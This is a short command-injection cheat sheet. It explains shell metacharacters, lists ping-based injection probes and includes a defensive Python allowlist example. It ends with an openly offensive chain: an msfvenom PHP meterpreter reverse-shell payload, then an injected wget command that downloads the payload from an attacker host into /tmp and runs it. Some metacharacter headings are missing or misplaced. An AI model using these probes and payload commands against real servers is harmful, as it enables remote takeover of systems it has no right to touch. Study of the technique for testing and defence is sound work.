Remote command injection

Check the web server's input parameters: GET, POST, and HTTP headers.


The semicolon (;) is the most common metacharacter used to test for an injection flaw. The shell runs all the commands separated by semicolons in sequence.


It separates multiple commands on one command line. It runs the first command, then the second command.

It runs the command following && only if the preceding command is successful.

It runs the command following || only if the preceding command fails: the first command runs, then the second command runs only if the first did not complete successfully.

|| (Linux)

Redirects the standard output of the first command to the standard input of the second command.

The unquoting metacharacter (the backtick) is used to force the shell to interpret and run the command between the backticks. The following is an example of this command: variable="OS version `uname -a`" && echo $variable


It is used to nest commands
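
Seen from the defending side, the metacharacters described above only matter when a request parameter reaches a shell. The following is an added example, not code from the original post: it validates a hypothetical "host" parameter against an allowlist (an IP literal only), builds an argv list so that no shell parses the value, and records which metacharacters a rejected value contained. The parameter, the function names and the constructed sample values are assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote

# Metacharacters from the list above: ; & | ` ( ) plus newline (%0a once decoded).
SHELL_META = re.compile(r"[;&|`()\r\n]")

# Constructed sample values for a hypothetical "host" parameter.
SAMPLES = [
    "127.0.0.1",
    "127.0.0.1;ping -i 30;",
    "127.0.0.1%0a ping -i 30 %0a",
    "127.0.0.1 | ping -n 30|",
    "127.0.0.1 && ping -i 30",
]


def find_metacharacters(raw_value):
    """Return the distinct shell metacharacters in a URL-encoded value (for logging)."""
    decoded = unquote(raw_value)  # %0a becomes "\n", %3b becomes ";"
    return sorted(set(SHELL_META.findall(decoded)))


def build_ping_argv(raw_value):
    """Allowlist check: accept only an IP literal, then build an argv list.

    Raises ValueError for anything else. The list is meant for
    subprocess.run(argv) with the default shell=False, so no shell ever
    parses the value.
    """
    addr = ipaddress.ip_address(unquote(raw_value).strip())
    return ["ping", "-c", "1", str(addr)]


def triage(raw_value):
    """Return ("ok", argv) or ("reject", metacharacters found)."""
    try:
        return ("ok", build_ping_argv(raw_value))
    except ValueError:
        return ("reject", find_metacharacters(raw_value))


if __name__ == "__main__":
    for value in SAMPLES:
        print(repr(value), "->", triage(value))
```

The allowlist is the control; the metacharacter list is only there to make rejected requests easy to spot in logs.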


| ping -i 30 |
| ping -n 30|
& ping -i 30
&ping -n 30
;ping -i 30;
%0a ping -i 30 %0a
` ping

If the above works, then use msfpayload to create the following:

msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=666 -e php/base64 -f raw > /root/Desktop/exploit.txt

Open the exploit.txt file and add the PHP opening and closing tags:

 <?php echo ... ?>

Start an HTTP web server and execute the following:

;wget http://<attacking_ip>/exploit.txt  -O /tmp/exploit.php;php -f /tmp/exploit.php

